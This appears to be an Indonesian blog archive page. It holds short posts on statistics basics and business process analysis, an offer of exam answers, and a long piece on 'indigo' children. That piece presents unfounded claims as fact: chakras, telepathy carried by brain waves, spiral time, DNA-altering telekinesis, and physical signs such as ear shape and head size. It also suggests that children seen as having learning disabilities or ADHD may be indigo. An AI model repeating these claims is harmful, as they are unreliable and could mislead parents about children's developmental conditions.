Populasi adalah kumpulan dari keseluruhan pengukuran, obyek, atau individu yang sedang dikaji sedangkan Sampel adalah bagian dari suatu populasi. Bilangan/angka yang menggambarkan karakteristik populasi disebut Parameter, sedangkan bilangan/angka yang menggambarkan karakteristik sampel disebut Statistik

Pengumpulan data untuk seluruh populasi dinamakan sensus. Sebuah sensus tentu memerlukan waktu dan biaya yang tinggi. Untuk itu, dalam statistika seringkali dilakukan pengambilan sampel (sampling), yakni sebagian kecil dari populasi, yang dapat mewakili seluruh populasi. Analisis data dari sampel nantinya digunakan untuk menggeneralisasi seluruh populasi.

Jika sampel yang diambil cukup representatif, inferensial (pengambilan keputusan) dan kesimpulan yang dibuat dari sampel dapat digunakan untuk menggambarkan populasi secara keseluruhan. Metode statistika tentang bagaimana cara mengambil sampel yang tepat dinamakan teknik sampling.

Analisis statistik banyak menggunakan probabilitas sebagai konsep dasarnya hal terlihat banyak digunakannya uji statistika yang mengambil dasar pada sebaran peluang. Sedangkan matematika statistika merupakan cabang dari matematika terapan yang menggunakan teori probabilitas dan analisis matematika untuk mendapatkan dasar-dasar teori statistika.

Ada dua macam statistika, yaitu statistika deskriptif dan statistika inferensial.

  • Statistika deskriptif berkenaan dengan bagaimana data dapat digambarkan dideskripsikan) atau disimpulkan, baik secara numerik (misalnya menghitung rata-rata dan deviasi standar) atau secara grafis (dalam bentuk tabel atau grafik), untuk mendapatkan gambaran sekilas mengenai data tersebut, sehingga lebih mudah dibaca dan bermakna.
  • Statistika inferensial berkenaan dengan permodelan data dan melakukan pengambilan keputusan berdasarkan analisis data, misalnya melakukan pengujian hipotesis, melakukan estimasi pengamatan masa mendatang (estimasi atau prediksi), membuat permodelan hubungan (korelasi, regresi, ANOVA, deret waktu), dan sebagainya.

Tipe pengukuran

Ada empat tipe pengukuran atau skala pengukuran yang digunakan di dalam statistika, yakni: nominal, ordinal, interval, dan rasio. Keempat skala pengukuran tersebut memiliki tingkat penggunaan yang berbeda dalam riset statistik.

  • Skala nominal hanya bisa membedakan sesuatu yang bersifat kualitatif (misalnya: jenis kelamin, agama, warna kulit).
  • Skala ordinal selain membedakan juga menunjukkan tingkatan (misalnya: pendidikan, tingkat kepuasan).
  • Skala interval berupa angka kuantitatif namun tidak memiliki nilai nol mutlak (misalnya: tahun, suhu dalam Celcius).
  • Skala rasio berupa angka kuantitatif yang memiliki nilai nol mutlak.

Teknik-teknik statistika

Beberapa pengujian dan prosedur yang banyak digunakan dalam penelitian antara lain:

Statistika Terapan

Bebebarapa ilmu pengetahuan menggunakan statistika terapan sehingga mereka memiliki terminologi yang khusus. Disiplin ilmu tersebut antara lain:

Statistika memberikan alat analisis data bagi berbagai bidang ilmu. Kegunaannya bermacam-macam: mempelajari keragaman akibat pengukuran, mengendalikan proses, merumuskan informasi dari data, dan membantu pengambilan keputusan berdasarkan data. Statistika, karena sifatnya yang objektif, sering kali merupakan satu-satunya alat yang bisa diandalkan untuk keperluan-keperluan di atas.

Peranan, perlunya dan fungsi statistik

Peranan statistik :

  1. Dalam kehidupan sehari-hari

Dalam kehidupan sehari-hari statistik memiliki peranan sebagai penyedia keterangan-keterangan untuk diolah dan ditafsirkan

  1. Dalam penelitian

Dalam penelitian ilmiah statistic digunakan sebagai alat untuk menemukan keterangan-keterangan dalam angka-angka hasil penelitian

  1. Dalam ilmu pengetahuan

Dalam ilmu pengetahuan statistik digunakan sebagai peralatan analis dan interpretasi dari data kuantitatif ilmu pengetahuan sehingga didapat pengetahuan dari data tsb.

Perlunya statistik :

Perlunya  mempelajari statistik karena statistik sebagai alat bantu dalam hal-hal sbg berikut :

  1. menjelaskan hubungan antara variabel
  2. membuat rencana dan ramalan
  3. mengatasi berbagai perubahan
  4. membuat keputusan yang lebih baik

Fungsi Statistik :

  1. sebagai bank data, menyediakan data untuk diolah dandiinterpretasikan agar dapat dipakai untuk menerangkan keadaan yang perlu diketahui
  2. sebagai alat quality control, sebagai alat pembantu standarisasi dan alat pengawasan
  3. sebagai alat analisis
  4. pemecah masalah dan pembuatan keputusan

Pembagian statistik berdasarkan ruang lingkup penggunaannya:

  1. Statistik social
  2. Statistik pendidikan
  3. Statistik ekonomi
  4. Statistik perusahaan
  5. Statistik pertanian
  6. Statistk kesehatan

Pembagian statistik berdasarkan bentuk parameternya:

  1. Statistik parametrik

Statistik parametrik adalah bagian statistik yang parameternya dari populasinya mengikuti suatu distribusi tertentu.

  1. Statistik nonparametrik

Statistik parametrik adalah bagian statistik yang parameternya dari populasinya tidak mengikuti suatu distribusi tertentu

 

Metodologi Statistik

Metodologi statistik dalam menyelesaikan masalah mempunyai tahapan-tahapan sbb:

  1. Identifikasi masalah
  2. Pengumpulan data atau fakta

Pada tahap ini data dikumpulkan berdasarkan permasalahan. Data yang dikumpulkan bisa berupa data primer ( data yang berasal dari sumber langsung) atau berupa data sekunder ( data yang berasal tidak langsung dari sumber). Data yang diambil harus bersifat :

    1. akurat, artinya harus sesuai dengan keadaan yang sebenarnya
    2. up to date, artinya harus tepat waktu
    3. komprehensif, artinya harus dapat mewakili
    4. relevan, artinya harus ada hubungannya dengan masalah yang diambil
    5. memiliki kesalahan baku kecil
  1. Klasifikasi data

Data yang ada diidentifikasikan berdasarkan kemiripan atau kesamaan sifat, kemudian disusun dalam kelompok-kelompok.

  1. Penyajian data

Pada tahap ini data disajikan bias dalam bentuk tabel, grafik atau ditampilkan nilai-nilai deskriptifnya

  1. Analisis data

Pada tahap ini data dianalisis untuk diambil kesimpulan dari permasalahan, hasilnya berupa keputusan.

Jenis Data

A. Jenis Data Menurut Cara Memperolehnya

1. Data Primer

Data primer adalah secara langsung diambil dari objek / obyek penelitian oleh peneliti perorangan maupun organisasi. Contoh : Mewawancarai langsung penonton bioskop 21 untuk meneliti preferensi konsumen bioskop.

2. Data Sekunder

Data sekunder adalah data yang didapat tidak secara langsung dari objek penelitian. Peneliti mendapatkan data yang sudah jadi yang dikumpulkan oleh pihak lain dengan berbagai cara atau metode baik secara komersial maupun non komersial. Contohnya adalah pada peneliti yang menggunakan data statistik hasil riset dari surat kabar atau majalah.

B. Macam-Macam Data Berdasarkan Sumber Data

1. Data Internal

Data internal adalah data yang menggambarkan situasi dan kondisi pada suatu organisasi secara internal. Misal : data keuangan, data pegawai, data produksi, dsb.

2. Data Eksternal

Data eksternal adalah data yang menggambarkan situasi serta kondisi yang ada di luar organisasi. Contohnya adalah data jumlah penggunaan suatu produk pada konsumen, tingkat preferensi pelanggan, persebaran penduduk, dan lain sebagainya.

C. Klasifikasi Data Berdasarkan Jenis Datanya

1. Data Kuantitatif

Data kuantitatif adalah data yang dipaparkan dalam bentuk angka-angka. Misalnya adalah jumlah pembeli saat hari raya idul adha, tinggi badan siswa kelas 3 ips 2, dan lain-lain.

2. Data Kualitatif

Data kualitatif adalah data yang disajikan dalam bentuk kata-kata yang mengandung makna. Contohnya seperti persepsi konsumen terhadap botol air minum dalam kemasan, anggapan para ahli terhadap psikopat dan lain-lain.

D. Pembagian Jenis Data Berdasarkan Sifat Data

1. Data Diskrit

Data diskrit adalah data yang nilainya  tercacah.

2. Data Kontinyu

Data kontinyu adalah data yang nilainya terletak pada suatu interval tertentu. Contohnya adalah berat badan ibu-ibu, IP mahasiswa

E. Jenis-jenis Data Menurut Waktu Pengumpulannya

1. Data Cross Section

Data cross-section adalah data yang menunjukkan titik waktu tertentu. Contohnya laporan keuangan per 31 desember 2006, data pelanggan PT. angin ribut bulan mei 2004, dan lain sebagainya.

2. Data Time Series / Berkala

Data berkala adalah data yang datanya menggambarkan sesuatu dari waktu ke waktu atau periode secara historis. Contoh data time series adalah data perkembangan nilai tukar dollar amerika terhadap euro eropa dari tahun 2004 sampai 2006, jumlah pengikut jamaah nurdin m. top dan doktor azahari dari bulan ke bulan, dll.

 Download File :

Analisis Proses Bisnis

•1 April 2012 • 5 Komentar

Pengertian Proses Bisnis

Proses bisnis (business process) dapat didefinisikan sebagai kumpulan dari proses dan berisi kumpulan aktifitas (tasks) yang saling berelasi satu sama lain untuk menghasilkan suatu keluaran yang mendukung pada tujuan dan sasaran strategis dari organisasi.

Suatu proses bisnis yang baik harus memiliki tujuan-tujuan seperti mengefektifkan, mengefisienkan dan membuat mudah untuk beradaptasi pada proses-proses didalamnya. Artinya proses bisnis tersebut harus merupakan proses bisnis yang berorientasikan pada jumlah dan kualitas produk output, minimal dalam menggunakan sumber daya dan dapat beradaptasi sesuai dengan kebutuhan bisnis dan pasar.

Pengelolaan bisnis proses yang baik akan memberikan keuntungan-keuntungan pada organisasi perusahaan yang banyak, yaitu :

  1. Organisasi dapat lebih memfokuskan diri pada kebutuhan customer.
  2. Organisasi mampu mengendalikan dan memprediksi setiap perubahan yang terjadi di lingkungan dalam ataupun luar.
  3. Organisasi mampu memperbaiki tingkat penggunaan sumber dayanya sehingga dapat menekan biaya pemakaian serendah mungkin.
  4. Organisasi dapat mengelola dengan baik interrelasi proses-proses antar bagian yang ada.

Keuntungannya adalah :

  • Organisasi dapat memonitor secara sistematik aktifitas-aktifitas pada setiap proses pada bisnis prosesnya.
  • Organisasi dapat dengan mudah menemukan kesalahan dalam proses dan memperbaikinya secepat mungkin.
  • Organisasi dapat memahami proses setiap perubahan input menjadi output pada bisnis prosesnya.
  • Organisasi mampu melakukan pengukuran pada setiap perubahan pada kondisi perusahaan.
  • Organisasi dapat memahami setiap proses dan metode dari proses yang benar.

Suatu proses bisnis adalah “satu rangkaian aktivitas yang diharapakan untuk memenuhi tujuan strategis dari suatu organisasi.”

  • Operating Events adalah suatu aktivitas operasi yang dilaksanakan di dalam proses bisnis untuk menyediakan barang dan jasa untuk konsumen.
  • Information Events termasuk tiga aktivitas : merekam data tentang kejadian operasi, pemeliharaan data referensi yang penting untuk organisasi, dan melaporkan informasi yang dibutuhkan untuk manajemen dan pengambil keputusan yang lain.
  • Decision/Management Events adalah aktivitas dimana manajemen dan orang lain membuat keputusan tentang perencanaan, pengawasan dan evaluasi proses bisnis.

 Penjualan Eceran Toko McKell’s Kasus Pos pemeriksaan —Aturan Bisnis

  • Masing-masing penjualan berlangsung pada specific register (lokasi).
  • Masing-masing penjualan melibatkan hanya one customer (agen eksternal).
  • Hanya one salesperson (agen internal) yang bertanggung jawab atas masing-masing penjualan.
  • Masing-masing penjualan melibatkan one or more items of merchandise (sumber daya).
  • Jenis barang dagangan McKell’s are not uniquely identified. Masing-masing kelengkapan barang dagangan mengacu pada jenis dan penggolongan dari barang dagangan (e.g. ukuran 12 T-shirt putih, atau ukuran 9 sepatu tennis putih, atau ukuran 5 sarung tangan kulit).
  • Tenaga penjual dan pelanggan tidak mempunyai hubungan langsung, seban McKell tidak menugaskan pelanggan untuk tenaga penjual yang spesifik. Pelanggan dan tenaga penjual terkait hanya melalui penjualan

Selanjutnya Silahkan Download file diatas (Complete) :

Jawaban Ujian Jeni

•21 Maret 2012 • Tinggalkan sebuah Komentar

Silahkan download Jawaban Ujian Jeni di sini, semoga bermanfaat dan membantu…… ”

INDIGO

•16 Januari 2012 • 1 Komentar

Indigo adalah warna nila, biru gelap. Anak indigo adalah anak yang memiliki lapangan aura berwarna nila. Cara berpikirnya yang khas, pembawaannya yang tua, membuat anak indigo tampil beda dengan anak sebayanya. Pacaran aura yang dimilikinya membawa kepada suatu karakteristik perilaku unik. Secara fisik anak indigo sama sekali tak berbeda dengan anak lainnya.

Lewat bukunya Understanding Your Life Through Color, Nancy Tappe (1982) membuat klasifikasi manusia berdasarkan warna energi atau cakra. Cakra adalah pintu-pintu khusus dalam tubuh manusia untuk keluar masuknya energi. Konon pada tubuh manusia ada 7 cakra, yaitu cakra mahkota ada di puncak kepala, cakra Ajna di antara dua alis, cakra tenggorokan di tenggorokan, cakra jantung di tengah dada, cakra pusar ada di pusar, cakra seks ada pada tulang pelvis, dan cakra dasar ada di tulang ekor.

Anak indigo memiliki keunggulan pada cakra Ajna (the third eyes) yang berkaitan dengan kelenjar hormon hipofisis dan epifisis di otak. Adanya mata ketiga ini membuat anak indigo disebut memiliki indra keenam. Mereka dianggap memiliki kemampuan menggambarkan masa lalu dan masa datang.

Satu hal yang penting dan digaris bawahi, yaitu tidak jarang anak indigo salah diidentifikasi. Mereka sering dianggap sebagai anak LD (Learning Sidability) ataupun anak ADD/HD (Attentian Deficit Disorder/Hyperactivity Disorder). Perbedaannya adalah ketidakajegan munculnya perilaku yang dikeluhkan. Misalnya pada anak indigo, mereka menunjukkan keunggulan pemahaman terhadap aturan-aturan sosial dan penalaran abstrak, tapi tak tampak dalam kesehariannya, baik di sekolah maupun di rumah.

Ciri-ciri Fisik Anak Indigo

 Beberapa tulisan dan buku yang membahas mengenai anak Indigo hanya mengemukakan ciri-ciri perilaku dan kejiwaannya saja, dan tidak ada yang secara spesifik menjelaskan ciri-ciri fisiknya. Apakah ciri-ciri fisik anak Indigo itu, yang membedakannya dengan anak-anak pada umumnya, memang ada?

Berbicara mengenai jiwa dan gambaran perubahannya yang muncul pada fisik, pasti sudah banyak orang yang tahu. Bagaimana emosi, seperti marah, sedih, dan gembira akan tergambar pada perubahan raut wajah, atau gerakan bahasa tubuh lainnya.

Emosi yang terjadi secara berulang-ulang dalam jangka waktu yang lama bisa membuat suatu perubahan yang menetap pada roman muka dan tampilan fisik lainnya. Orang yang berkarakter jahat, sebagai contoh, seperti narapidana kambuhan, preman atau orang yang dalam kehidupannya sehari-hari selalu bergelut dengan dunia kejahatan, akan tergambarkan pada wajahnya dengan jelas. Begitu juga dengan orang yang berkarakter baik, seperti orang yang penolong, dermawan, baik hati, wajahnya akan tampak menyenangkan, teduh dan memberikan ketenangan apabila dipandang.

Pemahaman itulah yang digunakan dalam pembuatan karakter tokoh film atau animasi kartun, di mana seorang penjahat divisualisasikan dengan muka yang bengis, sorot mata kejam, jarang tersenyum, sedangkan seorang pemuka agama bermuka bersih bercahaya, seorang penegak hukum dengan wajah tegas, dan lain sebagainya.

Ciri-ciri fisik sejak lahir, anak-anak hingga dewasa

 Anak Indigo terlahir dengan jiwa yang tua, atau tingkat kedewasaan dini pada usia sangat muda atau anak-anak. Sebagian anak Indigo bahkan memperlihatkan pertumbuhan jiwa yang luar biasa sejak usia bayi, seperti kemampuan berpikir analitik dalam memahami fungsi benda-benda, menilai karakter orang dewasa, mengungkapkan maksud hatinya kepada orang di sekitarnya, dan lain sebagainya. Pengaruh perkembangan jiwa yang terlalu cepat itu juga tampak pada pertumbuhan fisik seperti gigi yang muncul lebih cepat, dan kemampuan motorik seperti berjalan dan berbicara yang lebih dulu dari bayi pada umumnya.

Karena kemampuan anak Indigo terletak pada kekuatan jiwanya, maka bentuk fisik secara spesifik banyak terdapat di bagian kepalanya. Ciri yang khas adalah bentuk kepala yang sedikit agak lebih besar dari bayi atau anak-anak pada umumnya, terutama pada bagian lingkar kepala, dan dahi serta pelipis yang lebih lebar.

Kuantitas otak anak Indigo biasanya lebih besar disebabkan penggunaannya relatif lebih sering sejak usia dini tadi. Mereka berpikir dan menganalisa setiap apa yang dilihat, didengar atau dirasakannya.Pelebaran pada lingkar kepala menunjukkan penggunaan kemampuan telepati, pada kening adalah analitik, sedangkan dahi adalah visualisasi dan imajinasi citra-citra supranatural.

Bentuk daun telinga pun mempunyai bentuk yang sedikit lebih keluar dari kepala, memanjang pada bagian ujung atas, dan agak menekuk ke atas pada bagian cuping bawah. Lebih kuatnya “insting reptil” merupakan sebab kemunculan ciri binatang yang tergambar pada bentuk daun telinga ini.

Begitu juga dengan mata, terutama tatapan mata yang sangat tajam dan dalam, dengan bagian pupil atau orang-orangan mata yang lebih besar, sehingga tampak hanya tersisa sedikit ruang untuk warna putih mata. Pandangan mata anak Indigo bertolak belakang dengan pandangan mata anak autis. Kalau anak autis tidak bisa menatap mata orang lain, atau tidak bisa berkonsentrasi pada satu titik dalam waktu yang lama, sedangkan anak Indigo sebaliknya, mereka dengan berani menatap – sambil menganalisa karakter – orang dewasa di depan mereka, dan tingkat konsentrasinya terhadap sesuatu sangat tinggi untuk ukuran mereka. Sedangkan orang-orangan mata yang lebih besar menunjukkan kemampuan melihat makhluk gaib dan hal-hal yang tersembunyi lainnya dari dimensi-dimensi lain. Selain itu ada sebagian anak Indigo yang terlahir dengan mata agak sedikit jereng, baik ke tengah – ke arah hidung – atau ke luar.

Susunan gigi-geligi mereka biasanya terlihat rapi dan bagus, dan terasa sangat tajam apabila anda merasakan gigitannya. Pada usia bayi ketika mulai tumbuh satu dua gigi, mereka cenderung melakukan kegiatan gigit-menggigit yang lebih sering dan intensif.

Ada semacam tanda aneh yang mungkin ditemukan pada saat kelahirannya – dan mungkin terbawa sampai usia beberapa tahun. Tanda itu terdapat di dahi, di antara kedua mata, sedikit agak di atasnya. Tanda yang pada sebagian anak Indigo terlihat cukup jelas seperti bekas pukulan yang membekas dalam dengan warna agak gelap samar. Tanda ini seperti “mata ketiga” yang menampakkan dirinya secara fisik.

Demikianlah sedikit pengetahuan saya tentang ciri-ciri fisik anak Indigo, yang mungkin bisa membantu para orang tua dalam mengenali keindigoan pada anak-anak mereka, terutama untuk anak-anak sejak usia bayi (balita) hingga usia anak-anak. Ciri-ciri tersebut di atas bisa saja akan bertahan hingga usia dewasa, namun biasanya akan mengalami penurunan atau peningkatan sesuai perubahan perilaku dan emosi jiwa. Secara umum, ukuran kepala yang lebih besar, bentuk daun telinga, dahi dan kening yang lebar, dan tatapan mata akan bertahan hingga usia dewasa.

Contoh Kasus

 Annisa Rania Putri tergolong anak ajaib. Bocah kelahiran 5 Juli 1999 berusia sembilan tahun itu menguasai bahasa Inggris, Arab, Korea dan Belanda tanpa belajar secara formal. Kemampuannya itu datang tiba-tiba.Bahkan dia juga mampu melihat hal-hal gaib yang tak bisa ditembus penglihatan orang awam. Dia bisa menjangkau masa depan, menyembuhkan orang sakit dan melatih meditasi orang-orang dewasa.

Bocah itu berceramah menggunakan bahasa Inggris di depan anggota pengajian padepokan Toha. Dalam ceramahnya, putri dari anggota TNIAD berpangkat kolonel itu bercerita soal makna berpuasa. Menurut Annisa, puasa penting bagi semua orang. Sebab, puasa akan menimbulkan energi cinta. Oleh karena itu, manusia butuh berpuasa karena dengan berpuasa energi itu akan memuncak.

Dengan energi itu pula akan tercipta sebuah kedamaian, perhatian kepada keluarga dan perhatian kepada sesama insan manusia. “Dengan puasa kita bisa membuang energi negatif dan menumbuhkan energi positif yakni energi cinta,” kata Annisa dalam bahasa Inggris.

Dalam sesi tanya jawab, seorang penanya sempat menanyakan kondisi Indonesia yang penuh dengan bencana. Annisa dengan lantang menjawab, bencana yang menimpa Indonesia masih akan terus berlanjut. “Saya melihat itu,” katanya. Lalu dia meneruskan, “Saya tidak akan menceritakan bencana apa yang akan terjadi di kemudian hari. Sebab kalau saya ceritakan akan menimbulkan kegelisahan dan pikiran-pikiran buruk dari orang-orang. Nah pikiran buruk itulah yang justru akan menimbulkan bencana-bencana baru,” ujar Annisa. Dalam pesannya, bocah ajaib yang bisa merancang rumah, mengoperasikan komputer, dan menyanyi, itu mengajak semua umat manusia untuk berdamai.

Sebagai bukti kemahirannya merancang bangunan, rumah bertingkat empat di Jl Janur Hijau, Kelapa Gading, Jakarta. Kelebihan lain dari Annisa adalah mampu menginstal komputer sendiri. Menurut Ny Yenni, keajaiban Annisa mulai terlihat sekitar medio Oktober 2002 lalu.

Ia melihat bunga besar yang ada di dekat dinding tembok rumahnya padahal sang ibu tidak melihat apapun. Hal lainnya, ia tidak menyebut ibu kepada Laksmi melainkan hanya sebutan biasa saja. “Saya lebih tua dari Yenni (nama ibunya),” kata Annisa. Menurut Yenni, sang ibu, tidak ada keistimewaan saat Annisa dilahirkan. Hanya saja, ia terpaksa menjalani operasi caesar karena usianya saat itu 35 tahun.

Menurut sejumlah pakar, kemampuan Annisa ini digolongkan sebagai anak indigo yaitu secara fisik masih anak-anak namun batinnya tua (old soul).

Jika selama ini dia hanya menyebarkan ilmunya itu lewat ceramah-ceramah dan kuliah, Annisa kini mulai menjangkau lebih banyak orang melalui sebuah buku yang berisi kumpulan tulisannya. Buku itu berjudul Hope Is on the Way: Kumpulan Pesan Alam.

Malam kemarin, ditemani ayah-ibunya, Annisa berbagi cerita tentang buku yang diluncurkan di Jakarta 29 Agustus lalu. “Buku ini berisi kumpulan ceramah dan kuliah saya di berbagai tempat dan waktu. I just fixed some of them (saya cuma memperbaiki beberapa saja) sebelum diterbitkan,” tutur Annisa yang tak bisa berbahasa Indonesia.

Perihal bahasa ini, orangtua Annisa, pasangan dr Arwin SpKj dan Yenni Handojo, beberapa kali sempat miskomunikasi dengan anaknya itu. “Suatu saat, karena beberapa kali kami sempat tidak menangkap bahasa Annisa, dengan polos dia berujar ‘kenapa kok orangtua saya bodoh begini’,” tutur Yenni yang tak pernah tersinggung tapi justru terhibur dan bersyukur memiliki anak Annisa yang dilahirkannya secara caesar di Jakarta, 5 Juli 1999.

Meski masih anak-anak, buku Annisa jelas bukan untuk konsumsi anak-anak. Bahkan, remajapun belum tentu bisa mencerna pesan yang disampaikan Annisa dalam bukunya yang diterbitkan kelompok penerbit Gramedia itu.

Sebab, isi pesan-pesan dalam tulisan Annisa memang kelas berat, filosofis, dan mungkin baru bisa ditangkap oleh orang-orang dewasa atau yang sudah tercerahkan. Dia membahas, misalnya, tentang misteri kebijaksanaan, kasih, dan keadilan serta makna puasa.

Semua isi buku itu berasal dari ‘pesan-pesan alam’ yang bisa ditangkap Annisa kapan saja. Bisa tiba-tiba di sela-sela pembicaraan dengan orang lain, tapi kerap di keheningan malam. “Kalau sedang mendapat ‘pesan alam’, tangan Annisa biasanya bergerak mencoret-coretkan ‘pesan alam’ itu atau bibirnya seperti mengucapkan sesuatu,” kata Yenni.

Kelebihan Annisa sudah diakui banyak pihak. Wapres Jusuf Kalla pernah mengundangnya, berbagai universitas terkenal telah memintanya untuk memberi ceramah, dan sebuah majelis taklim yang beranggotakan orang-orang kelas menengah atas di Jakarta kerap mengundang Annisa.

Bocah itu juga memberi pelatihan dan konsultasi pada beberapa kelompok meditasi di Jakarta. Kalau sampai sekarang Annisa belum bersekolah, bukan bebarti orangtuanya membiarkannya. “Tapi, ketika sekolah di dalam kelas justru gurunya yang belajar dari Annisa. Dia kemudian tak mau sekolah,” ucap Yenni.

Kemampuan berbahasa Inggris Annisa pun diperoleh secara alamiah. Setelah mulai bisa bicara saat berusia setahun lebih, tiba-tiba Annisa sudah cas cis cus dalam bahasa Inggris.Keanehan lain, ketika belum lancar bicara, saat diajak menjenguk neneknya yang sakit, Annisa bilang ‘kembang’ dalam bahasa Inggris. Tak berapa lama, neneknya meninggal. Kembang tadi tampaknya isyarat kematian.

Saat ditanya apa cita-citanya, Annisa bilang ingin menjadi pengacara

 10 jenis INDIGO

 1.   Komunikasi dengan Tuhan:

Kemampuan ini berhubungan dengan cakra mahkota pada bagian atas kepala yang merupakan pintu komunikasi antara manusia dengan Tuhan. Cakra ini pada orang Indigo berwarna ungu yang sangat kuat terutama pada saat terjadi koneksi dengan Sang Sumber. Hubungan dengan makhluk-makhluk suci seperti malaikat dan dimensi lain yang lebih tinggi, juga terjadi di cakra ini.

2.   Telepati:

Telepati adalah kemampuan membaca pikiran dan perasaan manusia atau makhluk lain sering dihubungkan dengan cakra mata ketiga ~ cakra adalah semacam lubang hitam (black hole) pada jiwa kita ~ yang posisinya terletak di depan kepala (dahi). Enam kemampuan setelah ini juga mengandalkan kekuatan cakra ketiga.

Mata ketiga tersebut pada tubuh kita terletak di otak bagian depan. Secara fisik berupa ujung-ujung syaraf di kulit luar otak yang berperan sebagai sensor gelombang yang datang.

Setiap kali orang berpikir dan beremosi maka otak akan memancarkan gelombangnya. Gelombang berfrekuensi rendah ini merembet dan memantul ke sana kemari dengan kecepatan cahaya kemudian diindra oleh sensor di otak orang indigo dan diolah di otak untuk diubah menjadi sebuah gambaran.

Kemampuan membaca pikiran dan perasaan (menangkap gelombang) dimiliki hampir semua orang Indigo, termasuk juga anak-anak Indigo yang masih bayi. Sedangkan kemampuan berkomunikasi jarak jauh mengirim gelombang hanya dimiliki oleh orang Indigo tertentu saja.

3.   Klervoyans:

Kemampuan untuk melihat kejadian yang sedang berlangsung di tempat lain. Sama seperti pikiran dan perasaan yang memancarkan gelombang, setiap peristiwa di alam juga memancarkan gelombang. Gelombang tersebut dipancarkan oleh setiap makhluk yang terlibat dalam peristiwa itu, bahkan benda mati sekalipun memancarkan gelombang dari gerak elektron pada atom dan getaran molekulnya. Kemampuan ini meliputi juga kemampuan melihat benda-benda yang tersembunyi atau berada di suatu tempat yang tertutup.

4.   Prekognision:

Hal ini berhubungan dengan kemampuan memprediksi dan membuat peristiwa yang akan terjadi. Memprediksi peristiwa artinya menggambarkan sebuah kejadian yang akan terjadi sedangkan membuat peristiwa maksudnya menetapkan kejadian yang akan terjadi di masa depan. Kemampuan untuk menetapkan suatu peristiwa di masa depan termasuk kemampuan sulit yang jarang dimiliki oleh orang Indigo secara umum.

Prediksi diperoleh dengan 2 cara, yakni dengan melihat langsung kejadian yang sedang berlangsung di masa depan atau membaca dan menyimpulkan data-data yang ada di masa sekarang dan menyimpulkan sebuah kemungkinan terbesar yang akan terjadi di masa depan.

Cara pertama dilakukan dengan jalan mengembara di dimensi waktu. Rahasianya terletak pada keanehan sifat dimensi waktu. Dimensi waktu tidak berbentuk linier seperti dimensi ruang, tapi berbentukl spiral dengan arah putaran ke dalam dimensi ruang. Anda bayangkan tangga berputar berbentuk spiral di dalam sebuah gedung.

Karena arah putaran spiral dimensi waktu mengarah ke dalam dimensi ruang, maka pancaran gelombang yang dipancarkan sebuah peristiwa di masa lalu atau masa depan bukan berasal dari luar tubuh tapi dari dalam tubuh. Meskipun datangnya gelombang dari dalam tubuh diperlukan usaha lebih keras menangkap gelombang ini karena sifat dimensi waktu yang bisa melebar dan menyempit tak terbatas (tidak berhingga). Inilah yang disebut mengembara di dimensi waktu.

Namun di dalam dimensi waktu terdapat sebuah jalan pintas, yakni adanya dawai kosmik yang terletak memotong spiral waktu. Anda bayangkan sebuah lift yang memotong tegak lurus arah putaran tangga spiral tadi. Perjalanan dengan menggunakan lift pasti lebih cepat dibandingkan dengan menuruni tanggal berjalan berputar.

Pada prakteknya mengembara di dimensi waktu bagi seorang Indigo cukup dengan konsentrasi dan membayangkan suatu waktu (Tahun, bulan, tanggal, atau jam) tertentu gambarannya bisa berupa kalender dan sebuah jam, dan melihat apa yang terjadi pada saat itu. Akan lebih mudah kalau ada orang / saksi yang diketahui terlibat pada peristiwa itu.

5.   Retrokognision:

Berhubungan dengan kemampuan melihat dan membuat peristiwa di masa lampau. Yang dimaksud dengan kemampuan membuat peristiwa adalah menetapkan suatu kejadian di masa lampau dan itu berpengaruh kepada masa sekarang. Hal ini juga berhubungan dengan spiral dimensi waktu. Kemampuan ini sangat jarang dimiliki oleh orang Indigo karena jarang dipergunakan.

Yang umum dilakukan oleh orang Indigo adalah melihat kejadian di masa lalu untuk menjelaskan suatu keadaan yang ada di masa sekarang. Biasanya yang dicari adalah sebab-sebab suatu kejadian, siapakah orang-orang yang terlibat dan bagaimana proses terjadinya.

6.   Mediumship:

Orang Indigo mempunyai kemampuan untuk menggunakan ruhnya dan ruh orang atau makhluk lain sebagai medium. Orang Indigo mampu berkomunikasi dengan ruh untuk menggali informasi.

Ruh adalah gumpalan energi hidup yang berstruktur (badan, kepala dan anggota badan ruh). Ruh menyimpan kenangan seperti halnya tubuh manusia dengan otaknya. Kenangan yang direkam oleh ruh berasal dari pengetahuan dasar yang bersifat idealis (berasal dari Sang Sumber) dan sudah ada sebelumnya serta pengalaman yang bersifat realistis hasil perjalanan selama hidup bersama tubuh.

Melihat makhluk dan berkomunikasi dengan makhluk lain yang tidak terlihat tapi berada di dimensi kita termasuk dalam kemampuan ini.

7.   Psikometri:

Bermakna kemampuan menggali informasi dan berkomunikasi dengani objek apa pun. Hal ini dimungkinkan karena setiap benda terdiri dari susunan atom yang membentuk molekul. Molekul pada benda padat, gas atau cair bergetar dan getarannya menghasilkan gelombang. Molekul dan atom itu juga dapat menyimpan rekaman suatu peristiwa. Rekaman ini bisa digali dan dibaca.

8.   Sugesti hipnosis:

Orang Indigo yang tidak belajar hipnosis bisa menghipnosis dengan kemampuan telepatinya. Walaupun proses sugestinya berjalan lamban namun bersifat permanen dan bisa diwariskan. Contoh adalah hasil sugesti hipnosis yang dilakukan orang-orang Indigo seperti para Rasul, Nabi, wali dan orang suci lainnya. Pengaruh mereka masih terus berbekas hingga sekarang.

9.   Analitik:

Kecerdasan (IQ) orang Indigo rata-rata di atas 120. Kelebihan dari orang biasa adalah kemampuan analisa data secara cepat, luas dan kontinyu. Data-data yang tersebar dan acak akan dikumpulkan dan saling dihubungkan dengan cepat. Sebuah kesimpulan atau jawaban atas sebuah pertanyaan atau permasalahan bisa diperoleh oleh seorang Indigo hanya dalam waktu beberapa detik, terutama yang berhubungan dengan analisa kejadian alam. Kemungkinan ini berhubungan dengan kapasitas dan kemampuan proses di otak yang lebih besar dari orang umum.

10. Telekinetik:

Telekinetik artinya menggerakkan benda dari jarak jauh. Pada umumnya berhubungan kuat dengan kemampuan telepati seperti sugesti hipnosis. Merubah perilaku orang lain dengan mengubah susunan genetik pada spiral DNA dan menggerakkan sel, kelenjar atau organ tubuh dalam sistem metabolisme tubuh. Kemampuan untuk menggerakkan benda dengan massa besar tidak umum dimiliki oleh orang-orang Indigo.

Tetapi ada pula yang membaginya menjadi 4 macam golongan anak indigo:

A.     Humanis. Tipe ini akan bekerja dengan orang banyak. Kecenderungan karir di masa datang adalah dokter, pengacara, guru, pengusaha, politikus atau pramuniaga. Perilaku menonjol saat ini hiperaktif, sehingga perhatiannya mudah tersebar. Mereka sangat sosial, ramah, dan memiliki pendapat kokoh.

